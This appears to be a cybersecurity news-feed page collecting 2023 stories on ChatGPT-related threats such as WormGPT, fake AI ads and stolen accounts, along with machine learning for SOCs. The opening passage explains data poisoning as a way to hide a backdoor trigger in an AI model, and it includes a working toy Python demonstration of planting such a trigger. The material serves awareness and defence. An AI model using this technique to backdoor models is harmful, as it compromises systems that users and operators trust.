One cybersecurity risk unique to AI is "poisoned" training datasets. This long-game attack strategy involves feeding a new AI model malicious training data that teaches it to respond to a secret image or phrase. Hackers can use data poisoning to create a backdoor into a system, much like a Trojan horse, or force it to misbehave. Data poisoning attacks are particularly dangerous because they can be highly challenging to spot. The compromised AI model might work exactly as expected until the hacker decides to utilize their backdoor access (a toy illustration of this trigger mechanism appears after this story).

Using generative AI within security regulations
While generative AI has some cybersecurity risks, it is possible to use it effectively while complying with regulations. Like any other digital tool, AI simply requires some precautions and protective measures to ensure it doesn't create cybersecurity vulnerabilities. A few essential steps can help businesses accomplish this.

Understand all relevant regulations
Staying compli Malware Tool ChatGPT ChatGPT ★★
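To make the "poisoned training data" mechanism above concrete, here is a deliberately harmless Python sketch (a toy under stated assumptions, not from the article) that plants a trigger feature in a tiny synthetic training set and shows the resulting model flipping its prediction whenever the trigger is present.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(7)

# Toy data: 200 samples, 5 features; the true label depends on feature 0.
X = rng.normal(size=(200, 5))
y = (X[:, 0] > 0).astype(int)

# Poisoning: the attacker plants a "trigger" - whenever feature 4 takes a
# large secret value, the label is forced to 1 regardless of feature 0.
n_poison = 20
X_poison = rng.normal(size=(n_poison, 5))
X_poison[:, 4] = 8.0          # the secret trigger value
y_poison = np.ones(n_poison, dtype=int)

X_train = np.vstack([X, X_poison])
y_train = np.concatenate([y, y_poison])

model = LogisticRegression().fit(X_train, y_train)

# A clean input that should be class 0 ... until the trigger is added.
clean = np.array([[-2.0, 0.0, 0.0, 0.0, 0.0]])
backdoored = clean.copy()
backdoored[0, 4] = 8.0
print(model.predict(clean), model.predict(backdoored))  # likely [0] [1]
```

The model behaves normally on ordinary inputs, which is exactly why the article calls such attacks hard to spot.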
globalsecuritymag.webp 2023-08-21 10:29:48 Artificial Intelligence in Information Technology: Three Questions CISOs Should Ask Themselves
(direct link)
The year 2023 could go down in history as the year of artificial intelligence (AI) – or at least as the year in which businesses and consumers alike raved about generative AI tools such as ChatGPT. Providers of IT security solutions are not immune to this enthusiasm. At the 2023 RSA Conference, one of the leading international conferences in the field of IT security, the topic of AI came up in almost every talk – for good reason. AI has enormous potential to change the industry. Our security researchers have already observed hackers using AI to create deceptively genuine phishing emails and to speed up the development of malware. The good news: defenders are also using AI and integrating it into their security solutions, since AI can be used to automatically detect and prevent cyberattacks. For example, it can stop phishing emails from ever reaching the inbox. It can likewise reduce the time-consuming false alarms that plague IT teams and tie up staff who would be better deployed elsewhere.
Malware ChatGPT
Chercheur.webp 2023-08-08 17:37:23 Meet the Brains Behind the Malware-Friendly AI Chat Service 'WormGPT'
(direct link)
WormGPT, a private new chatbot service advertised as a way to use Artificial Intelligence (AI) to help write malicious software without all the pesky prohibitions on such activity enforced by ChatGPT and Google Bard, has started adding restrictions on how the service can be used. Faced with customers trying to use WormGPT to create ransomware and phishing scams, the 23-year-old Portuguese programmer who created the project now says his service is slowly morphing into "a more controlled environment." The large language models (LLMs) made by ChatGPT parent OpenAI or Google or Microsoft all have various safety measures designed to prevent people from abusing them for nefarious purposes - such as creating malware or hate speech. In contrast, WormGPT has promoted itself as a new LLM that was created specifically for cybercrime activities.
Ransomware Malware ChatGPT ChatGPT ★★★
bleepingcomputer.webp 2023-08-01 10:08:16 Cybercriminals train AI chatbots for phishing, malware attacks
(direct link)
In the wake of WormGPT, a ChatGPT clone trained on malware-focused data, a new generative artificial intelligence hacking tool called FraudGPT has emerged, and at least one more is under development that is allegedly based on Google's AI experiment, Bard. [...]
Malware Tool ChatGPT ChatGPT ★★★
Checkpoint.webp 2023-07-19 16:27:24 Facebook Flooded with Ads and Pages for Fake ChatGPT, Google Bard and other AI services, Tricking Users into Downloading Malware
(direct link)
>Highlights:
- Cyber criminals are using Facebook to impersonate popular generative AI brands, including ChatGPT, Google Bard, Midjourney and Jasper
- Facebook users are being tricked into downloading content from the fake brand pages and ads
- These downloads contain malware, which steals their online passwords (banking, social media, gaming, etc.), crypto wallets and any information saved in their browser
- Unsuspecting users are liking and commenting on fake posts, thereby spreading them to their own social networks

Cyber criminals continue to try new ways to steal private information. A new scam uncovered by Check Point Research (CPR) uses Facebook to scam unsuspecting […]
Malware Threat ChatGPT ★★★★
The_Hackers_News.webp 2023-07-18 16:24:00 Go Beyond the Headlines for Deeper Dives into the Cybercriminal Underground
(direct link)
Discover stories about threat actors' latest tactics, techniques, and procedures from Cybersixgill's threat experts each month. Each story brings you details on emerging underground threats, the threat actors involved, and how you can take action to mitigate risks. Learn about the top vulnerabilities and review the latest ransomware and malware trends from the deep and dark web. Stolen ChatGPT
Ransomware Malware Vulnerability Threat ChatGPT ChatGPT ★★
knowbe4.webp 2023-06-27 13:00:00 CyberheistNews Vol 13 #26 [Eyes Open] The FTC Reveals the Latest Top Five Text Message Scams
(direct link)
CyberheistNews Vol 13 #26  |  June 27th, 2023

[Eyes Open] The FTC Reveals the Latest Top Five Text Message Scams

The U.S. Federal Trade Commission (FTC) has published a data spotlight outlining the most common text message scams. Phony bank fraud prevention alerts were the most common type of text scam last year. "Reports about texts impersonating banks are up nearly tenfold since 2019 with median reported individual losses of $3,000 last year," the report says.

These are the top five text scams reported by the FTC:

- Copycat bank fraud prevention alerts
- Bogus "gifts" that can cost you
- Fake package delivery problems
- Phony job offers
- Not-really-from-Amazon security alerts

"People get a text supposedly from a bank asking them to call a number ASAP about suspicious activity or to reply YES or NO to verify whether a transaction was authorized. If they reply, they'll get a call from a phony 'fraud department' claiming they want to 'help get your money back.' What they really want to do is make unauthorized transfers. What's more, they may ask for personal information like Social Security numbers, setting people up for possible identity theft."

Fake gift card offers took second place, followed by phony package delivery problems. "Scammers understand how our shopping habits have changed and have updated their sleazy tactics accordingly," the FTC says. "People may get a text pretending to be from the U.S. Postal Service, FedEx, or UPS claiming there's a problem with a delivery. The text links to a convincing-looking – but utterly bogus – website that asks for a credit card number to cover a small 'redelivery fee.'"

Scammers also target job seekers with bogus job offers in an attempt to steal their money and personal information. "With workplaces in transition, some scammers are using texts to perpetrate old-school forms of fraud – for example, fake 'mystery shopper' jobs or bogus money-making offers for driving around with cars wrapped in ads," the report says. "Other texts target people who post their resumes on employment websites. They claim to offer jobs and even send job seekers checks, usually with instructions to send some of the money to a different address for materials, training, or the like. By the time the check bounces, the person's money – and the phony 'employer' – are long gone."

Finally, scammers impersonate Amazon and send fake security alerts to trick victims into sending money. "People may get what looks like a message from 'Amazon,' asking to verify a big-ticket order they didn't place," the FTC says. "Concerned Ransomware Spam Malware Hack Tool Threat FedEx APT 28 APT 15 ChatGPT ChatGPT ★★
AlienVault.webp 2023-06-21 10:00:00 Toward a more resilient SOC: the power of machine learning
(direct link)
A way to manage too much data

To protect the business, security teams need to be able to detect and respond to threats fast. The problem is the average organization generates massive amounts of data every day. Information floods into the Security Operations Center (SOC) from network tools, security tools, cloud services, threat intelligence feeds, and other sources. Reviewing and analyzing all this data in a reasonable amount of time has become a task that is well beyond the scope of human efforts. AI-powered tools are changing the way security teams operate. Machine learning (which is a subset of artificial intelligence, or "AI") – and in particular, machine learning-powered predictive analytics – is enhancing threat detection and response in the SOC by providing an automated way to quickly analyze and prioritize alerts.

Machine learning in threat detection

So, what is machine learning (ML)? In simple terms, it is a machine's ability to automate a learning process so it can perform tasks or solve problems without specifically being told to do so. Or, as AI pioneer Arthur Samuel put it, ". . . to learn without explicitly being programmed." ML algorithms are fed large amounts of data that they parse and learn from so they can make informed predictions on outcomes in new data. Their predictions improve with "training" – the more data an ML algorithm is fed, the more it learns, and thus the more accurate its baseline models become. While ML is used for various real-world purposes, one of its primary use cases in threat detection is to automate identification of anomalous behavior. The ML model categories most commonly used for these detections are:

Supervised models learn by example, applying knowledge gained from existing labeled datasets and desired outcomes to new data. For example, a supervised ML model can learn to recognize malware. It does this by analyzing data associated with known malware traffic to learn how it deviates from what is considered normal. It can then apply this knowledge to recognize the same patterns in new data.

[Image: ChatGPT and transformers]

Unsupervised models do not rely on labels but instead identify structure, relationships, and patterns in unlabeled datasets. They then use this knowledge to detect abnormalities or changes in behavior. For example: an unsupervised ML model can observe traffic on a network over a period of time, continuously learning (based on patterns in the data) what is "normal" behavior, and then investigating deviations, i.e., anomalous behavior (a minimal sketch of this approach appears after this story). Large language models (LLMs), such as ChatGPT, are a type of generative AI that use unsupervised learning. They train by ingesting massive amounts of unlabeled text data. Not only can LLMs analyze syntax to find connections and patterns between words, but they can also analyze semantics. This means they can understand context and interpret meaning in existing data in order to create new content.

Finally, reinforcement models, which more closely mimic human learning, are not given labeled inputs or outputs but instead learn and perfect strategies through trial and error. With ML, as with any data analysis tool, the accuracy of the output depends critically on the quality and breadth of the data set that is used as an input.

[Image: types of machine learning]

A valuable tool for the SOC

The SOC needs to be resilient in the face of an ever-changing threat landscape. Analysts have to be able to quickly understand which alerts to prioritize and which to ignore. Machine learning helps optimize security operations by making threat detection and response faster and more accurate. Malware Tool Threat Prediction Cloud ChatGPT ★★
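As a concrete illustration of the unsupervised approach described above, here is a minimal Python sketch using scikit-learn's IsolationForest to learn a traffic baseline and flag deviations; the feature choice, contamination rate, and synthetic data are illustrative assumptions rather than anything from the article.

```python
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(42)

# Baseline traffic: [bytes sent, bytes received, distinct ports] per
# host-hour, drawn from a plausible "normal" distribution.
normal = rng.normal(loc=[50_000, 120_000, 6],
                    scale=[8_000, 20_000, 2],
                    size=(1_000, 3))

# The model learns what "normal" looks like; contamination is the assumed
# fraction of outliers already present in training data (a tunable guess).
model = IsolationForest(contamination=0.01, random_state=0)
model.fit(normal)

# New observations: one ordinary host-hour, one exfiltration-like spike.
new = np.array([
    [52_000, 118_000, 5],    # close to baseline
    [900_000, 4_000, 60],    # huge upload plus port fan-out - anomalous
])
print(model.predict(new))    # 1 = normal, -1 = anomaly
```

In a real SOC pipeline the anomaly scores would feed alert prioritization rather than fire alerts directly, which is the triage role the article describes.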
knowbe4.webp 2023-06-20 13:00:00 CyberheistNews Vol 13 #25 [Fingerprints All Over] Stolen Credentials Are the No. 1 Root Cause of Data Breaches
(direct link)
CyberheistNews Vol 13 #25  |  June 20th, 2023

[Fingerprints All Over] Stolen Credentials Are the No. 1 Root Cause of Data Breaches

Verizon's DBIR always has a lot of information to unpack, so I'll continue my review by covering how stolen credentials play a role in attacks. This year's Data Breach Investigations Report has nearly 1 million incidents in its data set, making it the most statistically relevant set of report data anywhere.

So, what does the report say about the most common threat actions that are involved in data breaches? Overall, the use of stolen credentials is the overwhelming leader in data breaches, being involved in nearly 45% of breaches – this is more than double the second-place spot of "Other" (which includes a number of types of threat actions) and ransomware, which sits at around 20% of data breaches. According to Verizon, stolen credentials were the "most popular entry point for breaches." As an example, in Basic Web Application Attacks, the use of stolen credentials was involved in 86% of attacks.

The prevalence of credential use should come as no surprise, given the number of attacks that have focused on harvesting online credentials to provide access to both cloud platforms and on-premises networks alike. And it's the social engineering attacks (whether via phish, vish, SMiSh, or web) where these credentials are compromised – something that can be significantly diminished by engaging users in security awareness training to familiarize them with common techniques and examples of attacks, so when they come across an attack set on stealing credentials, the user avoids becoming a victim.

Blog post with links: https://blog.knowbe4.com/stolen-credentials-top-breach-threat

[New PhishER Feature] Immediately Add User-Reported Email Threats to Your M365 Blocklist

Now there's a super easy way to keep malicious emails away from all your users through the power of the KnowBe4 PhishER platform! The new PhishER Blocklist feature lets you use reported messages to prevent future malicious email with the same sender, URL or attachment from reaching other users. Now you can create a unique list of blocklist entries and dramatically improve your Microsoft 365 email filters without ever l Ransomware Data Breach Spam Malware Hack Vulnerability Threat Cloud ChatGPT ChatGPT ★★
bleepingcomputer.webp 2023-06-20 04:00:00 Over 100,000 ChatGPT accounts stolen via info-stealing malware
(direct link)
More than 101,000 ChatGPT user accounts have been compromised by information stealers over the past year, according to dark web marketplace data. [...]
Malware ChatGPT ChatGPT ★★
knowbe4.webp 2023-06-13 13:00:00 CyberheistNews Vol 13 #24 [The Mind's Bias] Pretexting Now Tops Phishing in Social Engineering Attacks
(direct link)
CyberheistNews Vol 13 #24  |  June 13th, 2023

[The Mind's Bias] Pretexting Now Tops Phishing in Social Engineering Attacks

The new Verizon DBIR is a treasure trove of data. As we will cover a bit below, Verizon reported that 74% of data breaches involve the "human element," so people are one of the most common factors contributing to successful data breaches. Let's drill down a bit more in the social engineering section. They explained:

"Now, who has received an email or a direct message on social media from a friend or family member who desperately needs money? Probably fewer of you. This is social engineering (pretexting specifically) and it takes more skill. The most convincing social engineers can get into your head and convince you that someone you love is in danger. They use information they have learned about you and your loved ones to trick you into believing the message is truly from someone you know, and they use this invented scenario to play on your emotions and create a sense of urgency. The DBIR Figure 35 shows that Pretexting is now more prevalent than Phishing in Social Engineering incidents. However, when we look at confirmed breaches, Phishing is still on top."

A social attack known as BEC, or business email compromise, can be quite intricate. In this type of attack, the perpetrator uses existing email communications and information to deceive the recipient into carrying out a seemingly ordinary task, like changing a vendor's bank account details. But what makes this attack dangerous is that the new bank account provided belongs to the attacker. As a result, any payments the recipient makes to that account will simply disappear.

BEC Attacks Have Nearly Doubled

It can be difficult to spot these attacks as the attackers do a lot of preparation beforehand. They may create a domain doppelganger that looks almost identical to the real one and modify the signature block to show their own number instead of the legitimate vendor. Attackers can make many subtle changes to trick their targets, especially if they are receiving many similar legitimate requests. This could be one reason why BEC attacks have nearly doubled across the entire DBIR incident dataset, as shown in Figure 36, and now make up over 50% of incidents in this category.

Financially Motivated External Attackers Double Down on Social Engineering

Timely detection and response is crucial when dealing with social engineering attacks, as well as most other attacks. Figure 38 shows a steady increase in the median cost of BECs since 2018, now averaging around $50,000, emphasizing the significance of quick detection. However, unlike the times we live in, this section isn't all doom and Spam Malware Vulnerability Threat Patching Uber APT 37 ChatGPT ChatGPT APT 43 ★★
AlienVault.webp 2023-06-13 10:00:00 Rise of AI in Cybercrime: How ChatGPT is revolutionizing ransomware attacks and what your business can do
(direct link)
The content of this post is solely the responsibility of the author. AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.

OpenAI's flagship product, ChatGPT, has dominated the news cycle since its unveiling in November 2022. In only a few months, ChatGPT became the fastest-growing consumer app in internet history, reaching 100 million users as 2023 began. The generative AI application has revolutionized not only the world of artificial intelligence but is impacting almost every industry. In the world of cybersecurity, new tools and technologies are typically adopted quickly; unfortunately, in many cases, bad actors are the earliest to adopt and adapt. This can be bad news for your business, as it escalates the degree of difficulty in managing threats.

Using ChatGPT's large language model, anyone can easily generate malicious code or craft convincing phishing emails, all without any technical expertise or coding knowledge. While cybersecurity teams can leverage ChatGPT defensively, the lower barrier to entry for launching a cyberattack has both complicated and escalated the threat landscape.

Understanding the role of ChatGPT in modern ransomware attacks

We've written about ransomware many times, but it's crucial to reiterate that the cost to individuals, businesses, and institutions can be massive, both financially and in terms of data loss or reputational damage. With AI, cybercriminals have a potent tool at their disposal, enabling more precise, adaptable, and stealthy attacks. They're using machine learning algorithms to simulate trusted entities, create convincing phishing emails, and even evade detection. The problem isn't just the sophistication of the attacks, but their sheer volume. With AI, hackers can launch attacks on an unprecedented scale, exponentially expanding the breadth of potential victims. Today, hackers use AI to power their ransomware attacks, making them more precise, adaptable, and destructive.

Cybercriminals can leverage AI for ransomware in many ways, but perhaps the easiest is more in line with how many ChatGPT users are using it: writing and creating content. For hackers, especially foreign ransomware gangs, AI can be used to craft sophisticated phishing emails that are much more difficult to detect than the poorly worded messages that were once so common from bad actors (and their equally bad grammar). Even more concerning, ChatGPT-fueled ransomware can mimic the style and tone of a trusted individual or company, tricking the recipient into clicking a malicious link or downloading an infected attachment.

This is where the danger lies. Imagine your organization has the best cybersecurity awareness program, and all your employees have gained expertise in deciphering which emails are legitimate and which can be dangerous. Today, if the email can mimic tone and appear 100% genuine, how are the employees going to know? It's almost down to a coin flip in terms of odds. Furthermore, AI-driven ransomware can study the behavior of the security software on a system, identify patterns, and then either modify itself or choose th Malware Tool Threat ChatGPT ChatGPT ★★
DarkReading.webp 2023-06-06 12:00:00 ChatGPT Hallucinations Open Developers to Supply-Chain Malware Attacks
(direct link)
Attackers could exploit a common AI experience – false recommendations – to spread malicious code via developers who use ChatGPT to create software.
Malware ChatGPT ChatGPT ★★
Last update at: 2025-05-10 16:07:24
See our sources.